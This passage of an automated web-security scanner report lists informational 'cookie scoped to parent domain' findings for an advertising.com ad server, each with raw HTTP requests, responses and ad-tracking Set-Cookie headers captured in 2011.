GET /site=768033/size=300250/u=2/bnum=83985251/hr=13/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860 HTTP/1.1
Host: r1-ads.ace.advertising.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1308249463404&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACID=qw280013054845430029; BURL1=tGu1NBKvZTFMIYXH1444q3SyX69B==; A07L=3nk4AeYyv6xVEfe8Z9bY4WiTtx8BJRQVLsUBWYK8PItaPHIY5TRLepQ; GUID=MTMwODIyNzEyNzsxOjE2dDUxa28wOTRrMGt1OjM2NQ; aceRTB=rm%3DSat%2C%2016%20Jul%202011%2017%3A56%3A20%20GMT%7Cam%3DSat%2C%2016%20Jul%202011%2017%3A56%3A20%20GMT%7Cdc%3DSat%2C%2016%20Jul%202011%2017%3A56%3A20%20GMT%7Can%3DSat%2C%2016%20Jul%202011%2017%3A56%3A20%20GMT%7Crub%3DSat%2C%2016%20Jul%202011%2017%3A56%3A20%20GMT%7C; C2=Cxk+NFJwHob0Fn6sIWwJoaMjtKPCC0nBeJpwEg02FYMBdbdBGTwihXgxEwjmGYMBxGeBGTAQvagxEQW4FYMBLppBGTQghXgxEgN5FYMB6ijBGTAmhXgxEAY4FYMBdDmBGTA/yagxEAVZGYMBYimBGTA3WagxEQY4FYMBFGeBGTAxBagxEU1aGYMBbTeBGTQwBagxEYnXGYMBWGoBGTgQvagxEogmGYMBxmpBGTQRgagxE0soGYMB8mpBGHZAmZOiGkZj0jw+NXsbtiGA8Mohk7a+AcsmGSuAEOpRBbLuBoKuGm/smJwokaUwzClALRqRBXaxAMdPGTwrQQwdIachq62ApVmhvTqHIUbNG+G; F1=BIET63EBAAAABAAAAEBAECA; BASE=x7Q9ai23SwnkpMdYS8Ne5ru2BcaVK0Bv+k2PmTntoWJelwznY4jXxpCBEQvy2vvEbS3CqqiFiBEZTN3f2B0eLPd/um1PETsGuYvL8A8d0iDEOliUSEDbOxBFe8Zbf0hn7jp9fCFhyHZGl9Opr8TEX1wZjCzrmH356TZtDQXim3se4vocFHNEzrEdRL7ixf0OXuHQy3nGGuhGrOkUxjdUykM!; ROLL=U6APOjemptEW07uaB4l2FnxkoJDmaLF0BZFCNJJmI4r/kefeO05CNFPBGckTh2ewWp6Dkc9UB0fhTc7MO3Ile9a4XCLZ9d3J03tHf2C!

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.951514.768033.0XMC
Cache-Control: private, max-age=0, no-cache
Expires: Thu, 16 Jun 2011 18:37:43 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 553
Date: Thu, 16 Jun 2011 18:37:44 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: C2=41k+NFJwHob0Fm6sIWwJoaIjtKPCC0nxdJpwEg02FXMBdbdxFTwihXcxEwjmGXMBxGexFTAQvacxEQW4FXMBLppxFTQghXcxEgN5FXMB6ijxFTAmhXcxEAY4FXMBdDmxFTA/yacxEAVZGXMBYimxFTA3WacxEQY4FXMBFGexFTAxBacxEU1aGXMBbTexFTQwBacxEYnXGXMBWGoxFTgQvacxEogmGXMBxmpxFTQRgacxE0soGXMB8mpxFHZAmZOiGjZj0jw+NXobtiGA8MoRk7a+AcsmGRuAEOpBBbLuBoKuGl/smJwokaQwzClALRqBBXaxAMdPGSwrQQwdIaYhq62ApVmRvTqHIUbNG9G; domain=advertising.com; expires=Sat, 15-Jun-2013 18:37:43 GMT; path=/
Set-Cookie: F1=BgXT63EBAAAABAAAAIBACCA; domain=advertising.com; expires=Sat, 15-Jun-2013 18:37:43 GMT; path=/
Set-Cookie: BASE=x7Q9bi23SwnkpMdYS8Ne5ru2BcaVK0Bv+k2PmTntoWJelwznY4jXxpCBEQvy2vvEbS3CqqiFiBEZTN3f2B0eLPd/um1PETsGuYvL8A8d0iDEOliUSEDbOxBFe8Zbf0hn7jp9fCFhyHZGl9Opr8TEX1wZjCzrmH356TZtDQXim3se4vocFHNEzrEdRL7ixf0OXuHQy3nGGuhGrOkUxjdUyksh8ICJaKH!; domain=advertising.com; expires=Sat, 15-Jun-2013 18:37:43 GMT; path=/
Set-Cookie: ROLL=U6APPjemptEW07uaB4l2FnxkoJDmaLF0BZFCNJJmI4r/kefeO05CNFPBGckTh2ewWp6Dkc9UB0fhTc7MO3Ile9a4XCLZ9d3J03tHf2is4HpOTQJ!; domain=advertising.com; expires=Sat, 15-Jun-2013 18:37:43 GMT; path=/
Set-Cookie: 83985251=_4dfa4d78,7117460224,768033^951514^1183^0,0_; domain=advertising.com; path=/click

document.write('<script type="text/javascript" src="http://altfarm.mediaplex.com/ad/js/14302-119028-28901-0?mpt=7117460224&mpvc=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0000951514/
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r1-ads.ace.advertising.com
Path:	/site=768033/size=300250/u=2/bnum=90208788/hr=13/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

F1=B8iR63EBAAAABAAAAsAAOCA; domain=advertising.com; expires=Sat, 15-Jun-2013 18:06:39 GMT; path=/
BASE=x7Q9Ui23SwnkpMdYS8Ne5ru2BcaVK0Bv+k2PmTntoWJelwznY4jXxpCBEQvy2vvEbS3CqqiFiBEZTN3f2B0eLPd/um1PETsGuYvL8A8d0iDEOliUSEDbOxBFe8Zbf0hn7jp9fCFhyHZGl9Opr8TEX1wZjCzrmH356TZtDQH!; domain=advertising.com; expires=Sat, 15-Jun-2013 18:06:39 GMT; path=/
ROLL=U6APEjemptEW07uaB4l2FnxkoJDmaLF0BZFCNJJmI4r/kefeO05CNFP!; domain=advertising.com; expires=Sat, 15-Jun-2013 18:06:39 GMT; path=/
90208788=_4dfa462f,2878613427,768033^981602^1183^0,0_; domain=advertising.com; path=/click

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site=768033/size=300250/u=2/bnum=90208788/hr=13/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860 HTTP/1.1
Host: r1-ads.ace.advertising.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1308247598851&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACID=qw280013054845430029; BURL1=tGu1NBKvZTFMIYXH1444q3SyX69B==; A07L=3nk4AeYyv6xVEfe8Z9bY4WiTtx8BJRQVLsUBWYK8PItaPHIY5TRLepQ; GUID=MTMwODIyNzEyNzsxOjE2dDUxa28wOTRrMGt1OjM2NQ; aceRTB=rm%3DSat%2C%2016%20Jul%202011%2017%3A56%3A20%20GMT%7Cam%3DSat%2C%2016%20Jul%202011%2017%3A56%3A20%20GMT%7Cdc%3DSat%2C%2016%20Jul%202011%2017%3A56%3A20%20GMT%7Can%3DSat%2C%2016%20Jul%202011%2017%3A56%3A20%20GMT%7Crub%3DSat%2C%2016%20Jul%202011%2017%3A56%3A20%20GMT%7C; C2=vYk+NFJwHob0Fs6sIWwJoagjtKPCC0nRfJpwEg02FdMBdbdRHTwihX0xEwjmGdMBxGeRHTAQva0xEQW4FdMBLppRHTQghX0xEgN5FdMB6ijRHTAmhX0xEAY4FdMBdDmRHTA/ya0xEAVZGdMBYimRHTA3Wa0xEQY4FdMBFGeRHTAxBa0xEU1aGdMBbTeRHTQwBa0xEYnXGdMBWGoRHTgQva0xEogmGdMBxmpRHTQRga0xE0soGdMB8mpRHHZAmZOiGpZj0jw+NXActiGA8Moxl7a+AcsmGXuAEOphCbLuBoKuGr/smJwokaowzClALRqhCXaxAMdPGYwrQQwdIawh; F1=B8iR63EBAAAABAAAAoAAOCA; BASE=x7Q9Ui23SwnkpMdYS8Ne5ru2BcaVK0Bv+k2PmTntoWJelwznY4jXxpCBEQvy2vvEbS3CqqiFiBEZTN3f2B0eLPd/um1PETsGuYvL8A8d0iDEOliUSEDbOxBFe8Zbf0hn7jx9fCFhyHZGl9Opr8TEX1wZjCzrmH356TZtDQH!; ROLL=U6APHjemptEW07uaB4l2FnxkoJDmaLF0BZFCNJJmI4r/keP!

Response

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r1-ads.ace.advertising.com
Path:	/site=768033/size=300250/u=2/bnum=90827809/hr=13/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

C2=Lsk+NFJwHob0Fo6sIWwJoaQjtKPCC0nReJpwEg02FZMBdbdRGTwihXkxEwjmGZMBxGeRGTAQvakxEQW4FZMBLppRGTQghXkxEgN5FZMB6ijRGTAmhXkxEAY4FZMBdDmRGTA/yakxEAVZGZMBYimRGTA3WakxEQY4FZMBFGeRGTAxBakxEU1aGZMBbTeRGTQwBakxEYnXGZMBWGoRGTgQvakxEogmGZMBxmpRGTQRgakxE0soGZMB8mpRGHZAmZOiGlZj0jw+NXwbtiGA8Moxk7a+AcsmGTuAEOphBbLuBoKuGn/smJwokaYwzClALRqhBXaxAMdPGUwrQQwdIaghq62ApVmxvTqHIUbNG/GsDiAzPaAc; domain=advertising.com; expires=Sat, 15-Jun-2013 18:27:22 GMT; path=/
F1=BswS63EBAAAABAAAAABAGCA; domain=advertising.com; expires=Sat, 15-Jun-2013 18:27:22 GMT; path=/
BASE=x7Q9Zi23SwnkpMdYS8Ne5ru2BcaVK0Bv+k2PmTntoWJelwznY4jXxpCBEQvy2vvEbS3CqqiFiBEZTN3f2B0eLPd/um1PETsGuYvL8A8d0iDEOliUSEDbOxBFe8Zbf0hn7jp9fCFhyHZGl9Opr8TEX1wZjCzrmH356TZtDQXim3se4vocFHNEzrEdRL7ixf0OXuHQy3nW5shGrOE!; domain=advertising.com; expires=Sat, 15-Jun-2013 18:27:22 GMT; path=/
ROLL=U6APJjemptEW07uaB4l2FnxkoJDmaLF0BZFCNJJmI4r/kefeO05CNFPBGckTh2ewWp6Dkc9UB0fhTc7MO3Ile9aooALZ9dH!; domain=advertising.com; expires=Sat, 15-Jun-2013 18:27:22 GMT; path=/
90827809=_4dfa4b0b,8104060413,768033^1029730^1183^0,0_; domain=advertising.com; path=/click

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site=768033/size=300250/u=2/bnum=90827809/hr=13/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860 HTTP/1.1
Host: r1-ads.ace.advertising.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1308248842484&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACID=qw280013054845430029; BURL1=tGu1NBKvZTFMIYXH1444q3SyX69B==; A07L=3nk4AeYyv6xVEfe8Z9bY4WiTtx8BJRQVLsUBWYK8PItaPHIY5TRLepQ; GUID=MTMwODIyNzEyNzsxOjE2dDUxa28wOTRrMGt1OjM2NQ; aceRTB=rm%3DSat%2C%2016%20Jul%202011%2017%3A56%3A20%20GMT%7Cam%3DSat%2C%2016%20Jul%202011%2017%3A56%3A20%20GMT%7Cdc%3DSat%2C%2016%20Jul%202011%2017%3A56%3A20%20GMT%7Can%3DSat%2C%2016%20Jul%202011%2017%3A56%3A20%20GMT%7Crub%3DSat%2C%2016%20Jul%202011%2017%3A56%3A20%20GMT%7C; C2=Vnk+NFJwHob0Fp6sIWwJoaUjtKPCC0nheJpwEg02FaMBdbdhGTwihXoxEwjmGaMBxGehGTAQvaoxEQW4FaMBLpphGTQghXoxEgN5FaMB6ijhGTAmhXoxEAY4FaMBdDmhGTA/yaoxEAVZGaMBYimhGTA3WaoxEQY4FaMBFGehGTAxBaoxEU1aGaMBbTehGTQwBaoxEYnXGaMBWGohGTgQvaoxEogmGaMBxmphGTQRgaoxE0soGaMB8mphGHZAmZOiGmZj0jw+NX0btiGA8MoBl7a+AcsmGUuAEOpxBbLuBoKuGo/smJwokacwzClALRqxBXaxAMdPGVwrQQwdIakhq62ApVmBwTqHIUbNGAH; F1=BUdS63EBAAAABAAAA8AAICA; BASE=x7Q9Yi23SwnkpMdYS8Ne5ru2BcaVK0Bv+k2PmTntoWJelwznY4jXxpCBEQvy2vvEbS3CqqiFiBEZTN3f2B0eLPd/um1PETsGuYvL8A8d0iDEOliUSEDbOxBFe8Zbf0hn7jp9fCFhyHZGl9Opr8TEX1wZjCzrmH356TZtDQXim3se4vocFHNEzrEdRL7ixf0OXuHQy3H!; ROLL=U6APIjemptEW07uaB4l2FnxkoJDmaLF0BZFCNJJmI4r/kefeO05CNFPBGckTh2ewWp6Dkc9UB0fhTc7MO3Ile9K!

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.1029730.768033.0XMC
Cache-Control: private, max-age=0, no-cache
Expires: Thu, 16 Jun 2011 18:27:22 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 609
Date: Thu, 16 Jun 2011 18:27:23 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: C2=Lsk+NFJwHob0Fo6sIWwJoaQjtKPCC0nReJpwEg02FZMBdbdRGTwihXkxEwjmGZMBxGeRGTAQvakxEQW4FZMBLppRGTQghXkxEgN5FZMB6ijRGTAmhXkxEAY4FZMBdDmRGTA/yakxEAVZGZMBYimRGTA3WakxEQY4FZMBFGeRGTAxBakxEU1aGZMBbTeRGTQwBakxEYnXGZMBWGoRGTgQvakxEogmGZMBxmpRGTQRgakxE0soGZMB8mpRGHZAmZOiGlZj0jw+NXwbtiGA8Moxk7a+AcsmGTuAEOphBbLuBoKuGn/smJwokaYwzClALRqhBXaxAMdPGUwrQQwdIaghq62ApVmxvTqHIUbNG/GsDiAzPaAc; domain=advertising.com; expires=Sat, 15-Jun-2013 18:27:22 GMT; path=/
Set-Cookie: F1=BswS63EBAAAABAAAAABAGCA; domain=advertising.com; expires=Sat, 15-Jun-2013 18:27:22 GMT; path=/
Set-Cookie: BASE=x7Q9Zi23SwnkpMdYS8Ne5ru2BcaVK0Bv+k2PmTntoWJelwznY4jXxpCBEQvy2vvEbS3CqqiFiBEZTN3f2B0eLPd/um1PETsGuYvL8A8d0iDEOliUSEDbOxBFe8Zbf0hn7jp9fCFhyHZGl9Opr8TEX1wZjCzrmH356TZtDQXim3se4vocFHNEzrEdRL7ixf0OXuHQy3nW5shGrOE!; domain=advertising.com; expires=Sat, 15-Jun-2013 18:27:22 GMT; path=/
Set-Cookie: ROLL=U6APJjemptEW07uaB4l2FnxkoJDmaLF0BZFCNJJmI4r/kefeO05CNFPBGckTh2ewWp6Dkc9UB0fhTc7MO3Ile9aooALZ9dH!; domain=advertising.com; expires=Sat, 15-Jun-2013 18:27:22 GMT; path=/
Set-Cookie: 90827809=_4dfa4b0b,8104060413,768033^1029730^1183^0,0_; domain=advertising.com; path=/click

document.write('<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N5865.126262.AOLPERFORMANCENETWO/B5551575.40;sz=300x250;click=http://r1-ads.ace.advertising.com/click/site=0000768
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r1-ads.ace.advertising.com
Path:	/site=768033/size=300250/u=2/bnum=91953648/hr=13/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

C2=u6k+NFJwHob0Fl6sIWwJoaEjtKPCC0nhdJpwEg02FWMBdbdhFTwihXYxEwjmGWMBxGehFTAQvaYxEQW4FWMBLpphFTQghXYxEgN5FWMB6ijhFTAmhXYxEAY4FWMBdDmhFTA/yaYxEAVZGWMBYimhFTA3WaYxEQY4FWMBFGehFTAxBaYxEU1aGWMBbTehFTQwBaYxEYnXGWMBWGohFTgQvaYxEogmGWMBxmphFTQRgaYxE0soGWMB8mphFHZAmZOiGiZj0jw+NXkbtiGA8MoBk7a+AcsmGQuAEOpxAbLuBoKuGk/smJwokaMwzClALRqxAXaxAMdPGRwrQQwdIaUhq62ApVmBvTqHIUbNG8WtrCQIzaAJ; domain=advertising.com; expires=Sat, 15-Jun-2013 18:42:54 GMT; path=/
F1=B4qT63EBAAAABAAAAMBAACA; domain=advertising.com; expires=Sat, 15-Jun-2013 18:42:54 GMT; path=/
BASE=x7Q9ci23SwnkpMdYS8Ne5ru2BcaVK0Bv+k2PmTntoWJelwznY4jXxpCBEQvy2vvEbS3CqqiFiBEZTN3f2B0eLPd/um1PETsGuYvL8A8d0iDEOliUSEDbOxBFe8Zbf0hn7jp9fCFhyHZGl9Opr8TEX1wZjCzrmH356TZtDQXim3se4vocFHNEzrEdRL7ixf0OXuHQy3nGGuhGrOkUxjdUyksh8ICJaK3qk5KdseJ!; domain=advertising.com; expires=Sat, 15-Jun-2013 18:42:54 GMT; path=/
ROLL=U6APMjemptEW07uaB4l2FnxkoJDmaLF0BZFCNJJmI4r/kefeO05CNFPBGckTh2ewWp6Dkc9UB0fhTc7MO3Ile9a4XCLZ9d3J03tHf2is4HpOTQpM6s5GotJ!; domain=advertising.com; expires=Sat, 15-Jun-2013 18:42:54 GMT; path=/
91953648=_4dfa4eae,2076607817,768033^944664^1183^0,0_; domain=advertising.com; path=/click

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site=768033/size=300250/u=2/bnum=91953648/hr=13/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860 HTTP/1.1
Host: r1-ads.ace.advertising.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1308249773855&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACID=qw280013054845430029; BURL1=tGu1NBKvZTFMIYXH1444q3SyX69B==; A07L=3nk4AeYyv6xVEfe8Z9bY4WiTtx8BJRQVLsUBWYK8PItaPHIY5TRLepQ; GUID=MTMwODIyNzEyNzsxOjE2dDUxa28wOTRrMGt1OjM2NQ; aceRTB=rm%3DSat%2C%2016%20Jul%202011%2017%3A56%3A20%20GMT%7Cam%3DSat%2C%2016%20Jul%202011%2017%3A56%3A20%20GMT%7Cdc%3DSat%2C%2016%20Jul%202011%2017%3A56%3A20%20GMT%7Can%3DSat%2C%2016%20Jul%202011%2017%3A56%3A20%20GMT%7Crub%3DSat%2C%2016%20Jul%202011%2017%3A56%3A20%20GMT%7C; C2=41k+NFJwHob0Fm6sIWwJoaIjtKPCC0nxdJpwEg02FXMBdbdxFTwihXcxEwjmGXMBxGexFTAQvacxEQW4FXMBLppxFTQghXcxEgN5FXMB6ijxFTAmhXcxEAY4FXMBdDmxFTA/yacxEAVZGXMBYimxFTA3WacxEQY4FXMBFGexFTAxBacxEU1aGXMBbTexFTQwBacxEYnXGXMBWGoxFTgQvacxEogmGXMBxmpxFTQRgacxE0soGXMB8mpxFHZAmZOiGjZj0jw+NXobtiGA8MoRk7a+AcsmGRuAEOpBBbLuBoKuGl/smJwokaQwzClALRqBBXaxAMdPGSwrQQwdIaYhq62ApVmRvTqHIUbNG9G; F1=BgXT63EBAAAABAAAAIBACCA; BASE=x7Q9bi23SwnkpMdYS8Ne5ru2BcaVK0Bv+k2PmTntoWJelwznY4jXxpCBEQvy2vvEbS3CqqiFiBEZTN3f2B0eLPd/um1PETsGuYvL8A8d0iDEOliUSEDbOxBFe8Zbf0hn7jp9fCFhyHZGl9Opr8TEX1wZjCzrmH356TZtDQXim3se4vocFHNEzrEdRL7ixf0OXuHQy3nGGuhGrOkUxjdUyksh8ICJaKH!; ROLL=U6APPjemptEW07uaB4l2FnxkoJDmaLF0BZFCNJJmI4r/kefeO05CNFPBGckTh2ewWp6Dkc9UB0fhTc7MO3Ile9a4XCLZ9d3J03tHf2is4HpOTQJ!

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.944664.768033.0XMC
Cache-Control: private, max-age=0, no-cache
Expires: Thu, 16 Jun 2011 18:42:54 GMT
Content-Type: application/x-javascript; charset=utf-8
Vary: Accept-Encoding
Date: Thu, 16 Jun 2011 18:42:54 GMT
Content-Length: 1055
Connection: close
Set-Cookie: C2=u6k+NFJwHob0Fl6sIWwJoaEjtKPCC0nhdJpwEg02FWMBdbdhFTwihXYxEwjmGWMBxGehFTAQvaYxEQW4FWMBLpphFTQghXYxEgN5FWMB6ijhFTAmhXYxEAY4FWMBdDmhFTA/yaYxEAVZGWMBYimhFTA3WaYxEQY4FWMBFGehFTAxBaYxEU1aGWMBbTehFTQwBaYxEYnXGWMBWGohFTgQvaYxEogmGWMBxmphFTQRgaYxE0soGWMB8mphFHZAmZOiGiZj0jw+NXkbtiGA8MoBk7a+AcsmGQuAEOpxAbLuBoKuGk/smJwokaMwzClALRqxAXaxAMdPGRwrQQwdIaUhq62ApVmBvTqHIUbNG8WtrCQIzaAJ; domain=advertising.com; expires=Sat, 15-Jun-2013 18:42:54 GMT; path=/
Set-Cookie: F1=B4qT63EBAAAABAAAAMBAACA; domain=advertising.com; expires=Sat, 15-Jun-2013 18:42:54 GMT; path=/
Set-Cookie: BASE=x7Q9ci23SwnkpMdYS8Ne5ru2BcaVK0Bv+k2PmTntoWJelwznY4jXxpCBEQvy2vvEbS3CqqiFiBEZTN3f2B0eLPd/um1PETsGuYvL8A8d0iDEOliUSEDbOxBFe8Zbf0hn7jp9fCFhyHZGl9Opr8TEX1wZjCzrmH356TZtDQXim3se4vocFHNEzrEdRL7ixf0OXuHQy3nGGuhGrOkUxjdUyksh8ICJaK3qk5KdseJ!; domain=advertising.com; expires=Sat, 15-Jun-2013 18:42:54 GMT; path=/
Set-Cookie: ROLL=U6APMjemptEW07uaB4l2FnxkoJDmaLF0BZFCNJJmI4r/kefeO05CNFPBGckTh2ewWp6Dkc9UB0fhTc7MO3Ile9a4XCLZ9d3J03tHf2is4HpOTQpM6s5GotJ!; domain=advertising.com; expires=Sat, 15-Jun-2013 18:42:54 GMT; path=/
Set-Cookie: 91953648=_4dfa4eae,2076607817,768033^944664^1183^0,0_; domain=advertising.com; path=/click

document.write('<iframe src="http://view.atdmt.com/AVE/iview/285783663/direct;wi.300;hi.250/01/2076607817?click=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0000944664/cstr=91953648=_4
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r1-ads.ace.advertising.com
Path:	/site=768033/size=300250/u=2/bnum=9352727/hr=12/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

F1=BIbP63EBAAAABAAAAcAAcCA; domain=advertising.com; expires=Sat, 15-Jun-2013 17:30:26 GMT; path=/
BASE=x7Q9Ri23SwnkpMdYS8Ne5ru2BcaVK0Bv+k2PmTntoWJelwznY4jXxpCBEQvy2vvEbS3CqqiFiBEZTN3f2B0eLPd/um1PETsGuYvL8A8d0iDEOliUSEDbOxBFe8Zbf0hn7jx9fCFhyHZGl9O!; domain=advertising.com; expires=Sat, 15-Jun-2013 17:30:26 GMT; path=/
ROLL=U6APAjemptEW07uaB4l2FnB!; domain=advertising.com; expires=Sat, 15-Jun-2013 17:30:26 GMT; path=/
9352727=_4dfa3db2,2540351573,768033^956559^1183^0,0_; domain=advertising.com; path=/click

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site=768033/size=300250/u=2/bnum=9352727/hr=12/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860 HTTP/1.1
Host: r1-ads.ace.advertising.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1308245425794&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACID=qw280013054845430029; BURL1=tGu1NBKvZTFMIYXH1444q3SyX69B==; A07L=3nk4AeYyv6xVEfe8Z9bY4WiTtx8BJRQVLsUBWYK8PItaPHIY5TRLepQ; GUID=MTMwODIyNzEyNzsxOjE2dDUxa28wOTRrMGt1OjM2NQ; C2=y2j+NFJwHob0Fz6sIWwJoa8jtKPCC0nBhJpwEg02FkMBdbdBJTwihXQyEwjmGkMBxGeBJTAQvaQyEQW4FkMBLppBJTQghXQyEgN5FkMB6ijBJTAmhXQyEAY4FkMBdDmBJTA/yaQyEAVZGkMBYimBJTA3WaQyEQY4FkMBFGeBJTAxBaQyEU1aGkMBbTeBJTQwBaQyEYnXGkMBWGoBJTgQvaQyEogmGkMBxmpBJTQRgaQyE0soGkMB8mpBJHZAmZOiGwZj0jw+NXActiGA8Mohn7a+AcsmGeuAEOpREbLuBoKuGy/smJwokaExzClALRqREXaxAMdPGfwrQQwdIaMi; F1=BIbP63EBAAAABAAAAYAAcCA; BASE=x7Q9Ri23SwnkpMdYS8Ne5ru2BcaVK0Bv+k2PmTntoWJelwznY4jXxpCBEQvy2vvEbS3CqqiFiBEZTN3f2B0eLPd/um1PETsGuYvL8A8d0iDEOliUSEDbOxBFe8Bbf0hn7jx9fCFhyHZGl9O!; ROLL=U6APDjemptEW07O!

Response

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r1-ads.ace.advertising.com
Path:	/site=768034/size=728090/u=2/bnum=12937368/hr=12/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

